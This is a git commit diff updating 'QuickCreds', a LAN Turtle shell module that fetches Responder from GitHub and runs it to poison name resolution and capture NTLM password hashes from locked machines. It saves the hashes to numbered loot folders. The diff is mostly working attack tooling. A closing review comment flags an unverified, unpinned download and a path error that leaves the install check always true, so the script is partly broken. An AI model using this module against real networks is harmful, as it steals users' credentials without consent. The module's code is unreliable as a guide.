Fixed quickcreds with new responder size. (#43)

* Fixed quickcreds with new responder size.

Forces use of SD card amongst some other small fixes.

* corrected fixes

* remove comments

* fixed indexing

* Fixed indexing

* QuickCreds: Remove all trailing whitespace, fix indentation, drop unwanted comments

* Removed odd comment

Co-authored-by: Marc Egerton <foxtrot@malloc.me>
pull/45/head
Theo 2021-04-09 23:49:35 +02:00 committed by GitHub
parent e3ce49c4f3
commit 1452617da4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 148 additions and 126 deletions


@ -1,8 +1,9 @@
#!/bin/bash /usr/lib/turtle/turtle_module
VERSION="1.3"
DESCRIPTION="Snagging creds from locked machines --Mubix, Room362.com. Implements responder attack and saves creds to numbered directories in /root/loot. LED will blink while QuickCreds is running. Upon capture of NTLM hash the amber LED will light solid. Author: Hak5Darren. Credit: Mubix."
VERSION="1.4"
DESCRIPTION="Snagging creds from locked machines --Mubix, Room362.com. Implements responder attack and saves creds to numbered directories in /root/loot. LED will blink while QuickCreds is running. Upon capture of NTLM hash the LED will light solid. Author: Hak5Darren. Credit: Mubix."
CONF=/tmp/QuickCreds.form
# All "dialog" functionality is related to the Turtle shell
: ${DIALOG_OK=0}
: ${DIALOG_CANCEL=1}
: ${DIALOG_HELP=2}
@ -10,139 +11,160 @@ CONF=/tmp/QuickCreds.form
: ${DIALOG_ITEM_HELP=4}
: ${DIALOG_ESC=255}
LOOTDIR="/root/loot/quickcreds/"
RESPLOG=$LOOTDIR"responder.log"
RESPROOT="/sd"
RESPTEMPDL="/tmp/ResponderDownload/"
RESPURL="https://github.com/lgandx/Responder/archive/master.zip"
RESPLOGDIR=$RESPROOT/"Responder/logs"
SLEEPTIMER="1"
function configure {
# dialog --title "QuickCreds" --msgbox "\n\
# Dependencies will be installed. An Internet connection is required.\n\
# Upon configuration creds will be saved to /root/loot/ on boot." 9 72
dialog --title "QuickCreds" \
--yesno "\nInstall dependencies and configure QuickCreds?\n\
An Internet connection is required for installation.\n" 8 60
response=$?
case $response in
0) ;;
1) exit ;;
255) exit ;;
esac
# Check to see if QuickCreds has already been configured
if [[ -d /root/loot || -s /root/loot/responder.log ]];
then
dialog --title "QuickCreds" --msgbox "\nThe QuickCreds module is already configured.\n\
Creds are saved to /root/loot.\nEnable this module to attack on boot." 9 72
exit 1
fi
# Check for Internet connection
ping -q -w 5 -c 1 lanturtle.com &> /dev/null && {
:
} || {
dialog --title "QuickCreds" --msgbox "\n\
The LAN Turtle is currently offline.\nPlease connect the LAN Turtle to the Internet and try again. " 9 72
exit 1
}
# Install dependencies
opkg update | dialog --progressbox "Updating opkg" 14 72
if [[ ! $(opkg list-installed | grep python-sqlite3) ]];
then
opkg install python-sqlite3 | dialog --progressbox "Installing dependency python-sqlite3" 14 72
fi
if [[ ! $(opkg list-installed | grep screen) ]];
then
opkg install screen | dialog --progressbox "Installing dependency screen" 14 72
fi
if [[ ! $(opkg list-installed | grep python-openssl) ]];
then
opkg install python-openssl | dialog --progressbox "Installing dependency python-openssl" 14 72
fi
if [[ ! $(opkg list-installed | grep coreutils-sleep) ]];
then
opkg install coreutils-sleep | dialog --progressbox "Installing dependency coreutils-sleep" 14 72
fi
if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py ]];
then
rm -rf /etc/turtle/Responder
rm -rf /tmp/v2.3.3.5.tar.gz*
wget --progress=dot https://github.com/lgandx/Responder/archive/v2.3.3.5.tar.gz -P /tmp 2>&1 | dialog --progressbox "Download dependency responder" 14 72
mkdir /etc/turtle/Responder
tar xzf /tmp/v2.3.3.5.tar.gz -C /etc/turtle/Responder 2>&1 | dialog --progressbox "Install dependency responder" 14 72
rm -rf /tmp/v2.3.3.5.tar.gz*
fi
# Setup loot directory and complete setup
mkdir /root/loot
touch /root/loot/responder.log
dialog --title "QuickCreds" --msgbox "\n\
Configuration complete. Creds will be saved to /root/loot\n\
Enable this module to have it start the attack on boot.\n" 9 72
}
function start {
# Stop on-off-on DHCP blink pattern script
echo "Stopping DHCP Detect Blink Script"
/etc/init.d/dhcp_detect stop
echo ""
echo "QuickCreds started."
echo "LED will blink rapidly while QuickCreds is running."
echo "LED will light solid upon NTLM hash capture."
echo ""
echo "If starting this module from the Turtle Shell menu,"
echo "press CTRL+C to return."
echo "Starting attack..." >> /root/loot/responder.log
# Create new numbered loot directory and symlink it from Responder logs
cd /root/loot
dircount=$(ls -lad /root/loot/* | wc -l)
mkdir /root/loot/$((dircount))
# Delete all current Responder logs
rm -rf /etc/turtle/Responder/logs
ln -s /root/loot/$((dircount)) /etc/turtle/Responder/logs
# Stop dnsmasq
/etc/init.d/dnsmasq stop 1&> /dev/null
# Execute attack
screen -dmS responder bash -c 'cd /etc/turtle/Responder; python Responder.py -I br-lan -w -r -d -P'
# Blink upon hash capture
while true; do
# Grep for user creds and do not match on machine creds, machine usernames end in $
if [ $(grep -v '\$:' /etc/turtle/Responder/logs/*NTLM* 2>/dev/null) ];
then
if [[ ! $(cat /root/loot/responder.log | tail -n1) == *"Creds"* ]]
then
echo "Creds saved!" >> /root/loot/responder.log
#copy all responder logs to loot directory
cp /etc/turtle/Responder/logs/* /root/loot/$((dircount))
finished
# If SD card is mounted continue if not fail due to not enough space.
if grep -qs $RESPROOT /proc/mounts; then
/bin/echo "SD card is mounted."
else
/usr/bin/dialog --title "QuickCreds" --msgbox "An SD card is required to install this module." 9 72
exit 1
fi
fi
echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness 2>&1
sleep 1
echo 0 > /sys/class/leds/turtle\:yellow\:system/brightness 2>&1
sleep 1
done
# Ask if the user really wants to install the module and its dependencies
/usr/bin/dialog --title "QuickCreds" --yesno "\nInstall dependencies and configure QuickCreds?\nAn Internet connection is required for installation.\n" 8 60
response=$?
case $response in
0) ;;
1) exit ;;
255) exit ;;
esac
# Check to see if QuickCreds has already been configured
if [[ -d "$LOOTDIR" || -s "$RESPLOG" ]]; then
/usr/bin/dialog --title "QuickCreds" --msgbox "\nThe QuickCreds module is already configured.\nCreds are saved to $LOOTDIR.\nEnable this module to attack on boot." 9 72
exit 1
fi
# Check for Internet connection
/bin/ping -q -w 5 -c 1 www.google.com &> /dev/null && {
:
} || {
/usr/bin/dialog --title "QuickCreds" --msgbox "\nThe LAN Turtle is currently offline.\nPlease connect the LAN Turtle to the Internet and try again." 9 72
exit 1
}
# Install dependencies
/bin/opkg update | /usr/bin/dialog --progressbox "Updating opkg" 14 72
if [[ ! $(/bin/opkg list-installed | /bin/grep python-sqlite3) ]]; then
/bin/opkg install python-sqlite3 | /usr/bin/dialog --progressbox "Installing dependency python-sqlite3" 14 72
fi
if [[ ! $(/bin/opkg list-installed | /bin/grep screen) ]]; then
/bin/opkg install screen | /usr/bin/dialog --progressbox "Installing dependency screen" 14 72
fi
if [[ ! $(/bin/opkg list-installed | /bin/grep python-openssl) ]]; then
/bin/opkg install python-openssl | /usr/bin/dialog --progressbox "Installing dependency python-openssl" 14 72
fi
if [[ ! $(/bin/opkg list-installed | /bin/grep coreutils-sleep) ]]; then
/bin/opkg install coreutils-sleep | /usr/bin/dialog --progressbox "Installing dependency coreutils-sleep" 14 72
fi
if [[ ! $(/bin/opkg list-installed | /bin/grep unzip) ]]; then
/bin/opkg install unzip | /usr/bin/dialog --progressbox "Installing dependency unzip" 14 72
fi
# Check if Responder is installed (not the module available in the Turtle "GUI", but the tool taken straight from GitHub)
if [[ ! -d "$RESPROOT" || ! -s "$RESPROOT"Responder.py ]]; then
# Clean up
/bin/rm -rf "$RESPROOT"Responder/
/bin/rm -rf "$RESPTEMPDL"master.zip*
# Create new
/bin/mkdir -p "$RESPTEMPDL"
# Download and extract
/usr/bin/wget --progress=dot "$RESPURL" -P "$RESPTEMPDL" 2>&1 | /usr/bin/dialog --progressbox "Download dependency responder" 14 72
# Unpack the GitHub download
/usr/bin/unzip "$RESPTEMPDL"master.zip -d "$RESPTEMPDL" 2>&1 | /usr/bin/dialog --progressbox "Unpacking dependency responder" 14 72
/bin/rm "$RESPTEMPDL"Responder-master/tools/MultiRelay/bin/*.exe
/bin/mv "$RESPTEMPDL"Responder-master "$RESPTEMPDL"Responder
/bin/mv "$RESPTEMPDL"Responder "$RESPROOT"
/bin/rm -rf "$RESPTEMPDL"master.zip*
fi
# Setup loot directory and complete setup
/bin/mkdir -p "$LOOTDIR"
/usr/bin/dialog --title "QuickCreds" --msgbox "\nConfiguration complete. Creds will be saved to $LOOTDIR\nEnable this module to have it start the attack on boot.\n" 9 72
}
function finished {
echo 255 > /sys/class/leds/turtle\:yellow\:system/brightness 2>&1
exit
/bin/echo 255 > /sys/class/leds/lan-turtle\:orange\:system/brightness 2>&1
/bin/sync
exit
}
function start {
# Stop on-off-on DHCP blink pattern script, this is what causes the "Terminated" text to appear if running QuickCreds from within the Turtle module system in the Turtle "GUI"
/bin/echo "Stopping DHCP Detect Blink Script"
/etc/init.d/dhcp_detect stop
/bin/echo ""
/bin/echo "QuickCreds started."
/bin/echo "The orange LED will blink while QuickCreds is running."
/bin/echo "The orange LED will turn solid upon NTLM hash capture."
/bin/echo ""
/bin/echo "If starting this module from the Turtle Shell menu,"
/bin/echo "press CTRL+C to return."
# Create new numbered loot directory and symlink it from Responder logs
/bin/mkdir -p $LOOTDIR
cd $LOOTDIR
dircount=$(/bin/ls -lad $LOOTDIR/* | /usr/bin/wc -l)
# Adjust the number when creating the numbered lootdir for this session, if no existing dirs (i.e. wc -l = 0) then start with 1 instead of 0 otherwise there will be a gap between 0 and 2
if [[ $((dircount)) == 0 ]]; then dircount=1 ; fi
/bin/mkdir $LOOTDIR"Creds"$((dircount))
# Delete all current Responder logs
/bin/rm -rf $RESPLOGDIR
/bin/ln -s $LOOTDIR"Creds"$((dircount)) $RESPLOGDIR
# Saving interface info, surplus information and can be deleted
/sbin/ifconfig > $LOOTDIR"Creds"$((dircount))/ifconfig_dump.log
/bin/echo "Creds$((dircount)) - Initiating Responder attack..." >> $RESPLOG
# Stop dnsmasq
/bin/echo "Creds$((dircount)) - Stopping dnsmasq" >> $RESPLOG
/etc/init.d/dnsmasq stop 1&> /dev/null
# Execute attack
/bin/echo "Creds$((dircount)) - Starting screen and Responder" >> $RESPLOG
/usr/sbin/screen -dmS responder /bin/bash -c 'cd /sd/Responder; /usr/bin/python /sd/Responder/Responder.py -I eth0 -w -r -d -P'
/bin/echo "Creds$((dircount)) - LED blink pattern during attack enabled" >> $RESPLOG
# Blink upon hash capture
while true; do
# Grep for user creds and do not match on machine creds, machine usernames end in $
if [[ $(/bin/grep -v '\$:' $RESPLOGDIR/*NTLM* 2>/dev/null) ]]; then
/bin/echo "Creds$((dircount)) - Found user creds NTLM file in the logs directory!" >> $RESPLOG
/bin/echo "Creds$((dircount)) - Creds obtained and saved" >> $RESPLOG
#Copy all responder logs to loot directory
/bin/echo "Creds$((dircount)) - Copying the Responder native logs to loot directory" >> $RESPLOG
/bin/cp $RESPLOGDIR/* $LOOTDIR"Creds"$((dircount))
/bin/echo "Creds$((dircount)) - Calling the finished function" >> $RESPLOG
finished
fi
/bin/echo 255 > /sys/class/leds/lan-turtle\:orange\:system/brightness 2>&1
/bin/sleep $SLEEPTIMER
/bin/echo 0 > /sys/class/leds/lan-turtle\:orange\:system/brightness 2>&1
/bin/sleep $SLEEPTIMER
done
}
function stop {
kill $(ps | grep [R]esponder | awk {'print $1'})
/etc/init.d/dnsmasq start 1&> /dev/null
echo "QuickCreds Stopped"
/bin/kill $(/bin/ps | /bin/grep [R]esponder | /usr/bin/awk {'print $1'})
/etc/init.d/dnsmasq start 1&> /dev/null
/bin/echo "QuickCreds Stopped"
}
function status {
if ps | grep -w -q [R]esponder.py; then echo "1"; else echo "0"; fi
if [[ $(/bin/ps | /bin/grep -w [R]esponder.py) ]]; then /bin/echo "1"; else /bin/echo "0"; fi
}
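Review bot: The Responder download in `configure` is no longer pinned: `RESPURL` points at `archive/master.zip` where the replaced lines fetched the `v2.3.3.5` tag, and nothing checks the archive before it is unpacked and moved under `/sd`, so the device installs whatever master holds at install time. Pin it to a tag or commit, e.g. `RESPURL="https://github.com/lgandx/Responder/archive/<PINNED_TAG>.zip"` (the `Responder-master` directory name in the following lines changes with it), and compare the file's `sha256sum` with a value kept in the script before calling unzip. Because wget and unzip are piped into dialog, their exit status is lost, so a failed or partial download still falls through to the `mv`. Separately, `RESPROOT="/sd"` has no trailing slash, so `"$RESPROOT"Responder.py` and `"$RESPROOT"Responder/` resolve to `/sdResponder.py` and `/sdResponder/`; the "is it installed" test is therefore always true and the clean-up misses `/sd/Responder`. Writing them as `"$RESPROOT/Responder/Responder.py"` and `"$RESPROOT/Responder/"` matches how `RESPLOGDIR` and the `screen` command already spell the path.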